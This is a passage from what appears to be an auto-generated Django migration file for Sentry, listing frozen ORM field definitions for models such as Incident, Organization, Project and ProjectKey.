'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True', 'db_index': 'True'}),
'values_seen': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'})
},
'sentry.grouptagvalue': {
'Meta': {'unique_together': "(('group_id', 'key', 'value'),)", 'object_name': 'GroupTagValue', 'db_table': "'sentry_messagefiltervalue'", 'index_together': "(('project_id', 'key', 'value', 'last_seen'),)"},
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'group_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True', 'db_index': 'True'}),
'times_seen': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'sentry.grouptombstone': {
'Meta': {'unique_together': '()', 'object_name': 'GroupTombstone', 'index_together': '()'},
'actor_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'culprit': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {'null': 'True', 'blank': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'level': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '40', 'blank': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'previous_group_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'unique': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"})
},
'sentry.identity': {
'Meta': {'unique_together': "(('idp', 'external_id'), ('idp', 'user'))", 'object_name': 'Identity', 'index_together': '()'},
'data': ('sentry.db.models.fields.encrypted.EncryptedJsonField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_verified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'external_id': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'idp': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.IdentityProvider']"}),
'scopes': ('sentry.db.models.fields.array.ArrayField', [], {'of': (u'django.db.models.fields.TextField', [], {})}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.identityprovider': {
'Meta': {'unique_together': "(('type', 'external_id'),)", 'object_name': 'IdentityProvider', 'index_together': '()'},
'config': ('sentry.db.models.fields.encrypted.EncryptedJsonField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'external_id': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '64'})
},
'sentry.incident': {
'Meta': {'unique_together': "(('organization', 'identifier'),)", 'object_name': 'Incident', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_closed': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'date_detected': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_started': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'detection_uuid': ('sentry.db.models.fields.uuid.UUIDField', [], {'max_length': '32', 'null': 'True', 'db_index': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "u'incidents'", 'symmetrical': 'False', 'through': "orm['sentry.IncidentGroup']", 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'identifier': ('django.db.models.fields.IntegerField', [], {}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'projects': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "u'incidents'", 'symmetrical': 'False', 'through': "orm['sentry.IncidentProject']", 'to': "orm['sentry.Project']"}),
'query': ('django.db.models.fields.TextField', [], {}),
'status': ('django.db.models.fields.PositiveSmallIntegerField', [], {}),
'title': ('django.db.models.fields.TextField', [], {})
},
'sentry.incidentactivity': {
'Meta': {'unique_together': '()', 'object_name': 'IncidentActivity', 'index_together': '()'},
'comment': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'event_stats_snapshot': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.TimeSeriesSnapshot']", 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'incident': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Incident']"}),
'previous_value': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'type': ('django.db.models.fields.IntegerField', [], {}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'null': 'True'}),
'value': ('django.db.models.fields.TextField', [], {'null': 'True'})
},
'sentry.incidentgroup': {
'Meta': {'unique_together': "(('group', 'incident'),)", 'object_name': 'IncidentGroup', 'index_together': '()'},
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']", 'db_index': 'False'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'incident': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Incident']"})
},
'sentry.incidentproject': {
'Meta': {'unique_together': "(('project', 'incident'),)", 'object_name': 'IncidentProject', 'index_together': '()'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'incident': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Incident']"}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'db_index': 'False'})
},
'sentry.incidentseen': {
'Meta': {'unique_together': "(('user', 'incident'),)", 'object_name': 'IncidentSeen', 'index_together': '()'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'incident': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Incident']"}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'db_index': 'False'})
},
'sentry.integration': {
'Meta': {'unique_together': "(('provider', 'external_id'),)", 'object_name': 'Integration', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'external_id': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'metadata': ('sentry.db.models.fields.encrypted.EncryptedJsonField', [], {'default': '{}'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'organizations': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "u'integrations'", 'symmetrical': 'False', 'through': "orm['sentry.OrganizationIntegration']", 'to': "orm['sentry.Organization']"}),
'projects': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "u'integrations'", 'symmetrical': 'False', 'through': "orm['sentry.ProjectIntegration']", 'to': "orm['sentry.Project']"}),
'provider': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'null': 'True'})
},
'sentry.integrationexternalproject': {
'Meta': {'unique_together': "(('organization_integration_id', 'external_id'),)", 'object_name': 'IntegrationExternalProject', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'external_id': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'organization_integration_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'resolved_status': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'unresolved_status': ('django.db.models.fields.CharField', [], {'max_length': '64'})
},
'sentry.latestrelease': {
'Meta': {'unique_together': "(('repository_id', 'environment_id'),)", 'object_name': 'LatestRelease', 'index_together': '()'},
'commit_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True'}),
'deploy_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True'}),
'environment_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'release_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {}),
'repository_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {})
},
'sentry.lostpasswordhash': {
'Meta': {'unique_together': '()', 'object_name': 'LostPasswordHash', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'hash': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'unique': 'True'})
},
'sentry.monitor': {
'Meta': {'unique_together': '()', 'object_name': 'Monitor', 'index_together': "(('type', 'next_checkin'),)"},
'config': ('sentry.db.models.fields.encrypted.EncryptedJsonField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'guid': ('sentry.db.models.fields.uuid.UUIDField', [], {'auto_add': "'uuid:uuid4'", 'unique': 'True', 'max_length': '32'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_checkin': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'next_checkin': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'type': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'})
},
'sentry.monitorcheckin': {
'Meta': {'unique_together': '()', 'object_name': 'MonitorCheckIn', 'index_together': '()'},
'config': ('sentry.db.models.fields.encrypted.EncryptedJsonField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_updated': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'duration': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'guid': ('sentry.db.models.fields.uuid.UUIDField', [], {'auto_add': "'uuid:uuid4'", 'unique': 'True', 'max_length': '32'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'location': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.MonitorLocation']", 'null': 'True'}),
'monitor': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Monitor']"}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'})
},
'sentry.monitorlocation': {
'Meta': {'unique_together': '()', 'object_name': 'MonitorLocation', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'guid': ('sentry.db.models.fields.uuid.UUIDField', [], {'auto_add': "'uuid:uuid4'", 'unique': 'True', 'max_length': '32'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
'sentry.option': {
'Meta': {'unique_together': '()', 'object_name': 'Option', 'index_together': '()'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '64'}),
'last_updated': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'value': ('sentry.db.models.fields.encrypted.EncryptedPickledObjectField', [], {})
},
'sentry.organization': {
'Meta': {'unique_together': '()', 'object_name': 'Organization', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'default_role': ('django.db.models.fields.CharField', [], {'default': "'member'", 'max_length': '32'}),
'flags': ('django.db.models.fields.BigIntegerField', [], {'default': '1'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'members': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "u'org_memberships'", 'symmetrical': 'False', 'through': "orm['sentry.OrganizationMember']", 'to': "orm['sentry.User']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'})
},
'sentry.organizationaccessrequest': {
'Meta': {'unique_together': "(('team', 'member'),)", 'object_name': 'OrganizationAccessRequest', 'index_together': '()'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'member': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.OrganizationMember']"}),
'team': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Team']"})
},
'sentry.organizationavatar': {
'Meta': {'unique_together': '()', 'object_name': 'OrganizationAvatar', 'index_together': '()'},
'avatar_type': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'file': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.File']", 'unique': 'True', 'null': 'True', 'on_delete': 'models.SET_NULL'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32', 'db_index': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'avatar'", 'unique': 'True', 'to': "orm['sentry.Organization']"})
},
'sentry.organizationintegration': {
'Meta': {'unique_together': "(('organization', 'integration'),)", 'object_name': 'OrganizationIntegration', 'index_together': '()'},
'config': ('sentry.db.models.fields.encrypted.EncryptedJsonField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'default_auth_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True', 'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'integration': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Integration']"}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'})
},
'sentry.organizationmember': {
'Meta': {'unique_together': "(('organization', 'user'), ('organization', 'email'))", 'object_name': 'OrganizationMember', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'null': 'True', 'blank': 'True'}),
'flags': ('django.db.models.fields.BigIntegerField', [], {'default': '0'}),
'has_global_access': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'member_set'", 'to': "orm['sentry.Organization']"}),
'role': ('django.db.models.fields.CharField', [], {'default': "'member'", 'max_length': '32'}),
'teams': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sentry.Team']", 'symmetrical': 'False', 'through': "orm['sentry.OrganizationMemberTeam']", 'blank': 'True'}),
'token': ('django.db.models.fields.CharField', [], {'max_length': '64', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'token_expires_at': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True'}),
'type': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '50', 'blank': 'True'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'blank': 'True', 'related_name': "u'sentry_orgmember_set'", 'null': 'True', 'to': "orm['sentry.User']"})
},
'sentry.organizationmemberteam': {
'Meta': {'unique_together': "(('team', 'organizationmember'),)", 'object_name': 'OrganizationMemberTeam', 'db_table': "'sentry_organizationmember_teams'", 'index_together': '()'},
'id': ('sentry.db.models.fields.bounded.BoundedAutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'organizationmember': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.OrganizationMember']"}),
'team': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Team']"})
},
'sentry.organizationonboardingtask': {
'Meta': {'unique_together': "(('organization', 'task'),)", 'object_name': 'OrganizationOnboardingTask', 'index_together': '()'},
'data': ('sentry.db.models.fields.jsonfield.JSONField', [], {'default': '{}'}),
'date_completed': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'project_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True', 'blank': 'True'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'task': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'null': 'True'})
},
'sentry.organizationoption': {
'Meta': {'unique_together': "(('organization', 'key'),)", 'object_name': 'OrganizationOption', 'db_table': "'sentry_organizationoptions'", 'index_together': '()'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'value': ('sentry.db.models.fields.encrypted.EncryptedPickledObjectField', [], {})
},
'sentry.platformexternalissue': {
'Meta': {'unique_together': "(('group_id', 'service_type'),)", 'object_name': 'PlatformExternalIssue', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'display_name': ('django.db.models.fields.TextField', [], {}),
'group_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'service_type': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'web_url': ('django.db.models.fields.URLField', [], {'max_length': '200'})
},
'sentry.processingissue': {
'Meta': {'unique_together': "(('project', 'checksum', 'type'),)", 'object_name': 'ProcessingIssue', 'index_together': '()'},
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '40', 'db_index': 'True'}),
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '30'})
},
'sentry.project': {
'Meta': {'unique_together': "(('organization', 'slug'),)", 'object_name': 'Project', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'first_event': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'flags': ('django.db.models.fields.BigIntegerField', [], {'default': '0', 'null': 'True'}),
'forced_color': ('django.db.models.fields.CharField', [], {'max_length': '6', 'null': 'True', 'blank': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'public': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'null': 'True'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'teams': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "u'teams'", 'symmetrical': 'False', 'through': "orm['sentry.ProjectTeam']", 'to': "orm['sentry.Team']"})
},
'sentry.projectavatar': {
'Meta': {'unique_together': '()', 'object_name': 'ProjectAvatar', 'index_together': '()'},
'avatar_type': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'file': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.File']", 'unique': 'True', 'null': 'True', 'on_delete': 'models.SET_NULL'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32', 'db_index': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'avatar'", 'unique': 'True', 'to': "orm['sentry.Project']"})
},
'sentry.projectbookmark': {
'Meta': {'unique_together': "(('project', 'user'),)", 'object_name': 'ProjectBookmark', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True', 'blank': 'True'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.projectcficachefile': {
'Meta': {'unique_together': "(('project', 'debug_file'),)", 'object_name': 'ProjectCfiCacheFile', 'index_together': '()'},
'cache_file': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.File']"}),
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'debug_file': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.ProjectDebugFile']", 'on_delete': 'models.DO_NOTHING', 'db_column': "'dsym_file_id'"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'version': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {})
},
'sentry.projectdebugfile': {
'Meta': {'unique_together': '()', 'object_name': 'ProjectDebugFile', 'db_table': "'sentry_projectdsymfile'", 'index_together': "(('project', 'debug_id'), ('project', 'code_id'))"},
'code_id': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'cpu_name': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'data': ('sentry.db.models.fields.jsonfield.JSONField', [], {'null': 'True'}),
'debug_id': ('django.db.models.fields.CharField', [], {'max_length': '64', 'db_column': "'uuid'"}),
'file': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.File']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'object_name': ('django.db.models.fields.TextField', [], {}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'})
},
'sentry.projectintegration': {
'Meta': {'unique_together': "(('project', 'integration'),)", 'object_name': 'ProjectIntegration', 'index_together': '()'},
'config': ('sentry.db.models.fields.encrypted.EncryptedJsonField', [], {'default': '{}'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'integration': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Integration']"}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"})
},
'sentry.projectkey': {
'Meta': {'unique_together': '()', 'object_name': 'ProjectKey', 'index_together': '()'},
'data': ('sentry.db.models.fields.jsonfield.JSONField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'key_set'", 'to': "orm['sentry.Project']"}),
'public_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'rate_limit_count': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'rate_limit_window': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'roles': ('django.db.models.fields.BigIntegerField', [], {'default': '1'}),
'secret_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'})
},
'sentry.projectoption': {
'Meta': {'unique_together': "(('project', 'key'),)", 'object_name': 'ProjectOption', 'db_table': "'sentry_projectoptions'", 'index_together': '()'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'value': ('sentry.db.models.fields.encrypted.EncryptedPickledObjectField', [], {})
},
'sentry.projectownership': {
'Meta': {'unique_together': '()', 'object_name': 'ProjectOwnership', 'index_together': '()'},
'auto_assignment': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'fallthrough': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'last_updated': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'unique': 'True'}),
'raw': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'schema': ('sentry.db.models.fields.jsonfield.JSONField', [], {'null': 'True'})
},
'sentry.projectplatform': {
'Meta': {'unique_together': "(('project_id', 'platform'),)", 'object_name': 'ProjectPlatform', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {})
},
'sentry.projectredirect': {
'Meta': {'unique_together': "(('organization', 'redirect_slug'),)", 'object_name': 'ProjectRedirect', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
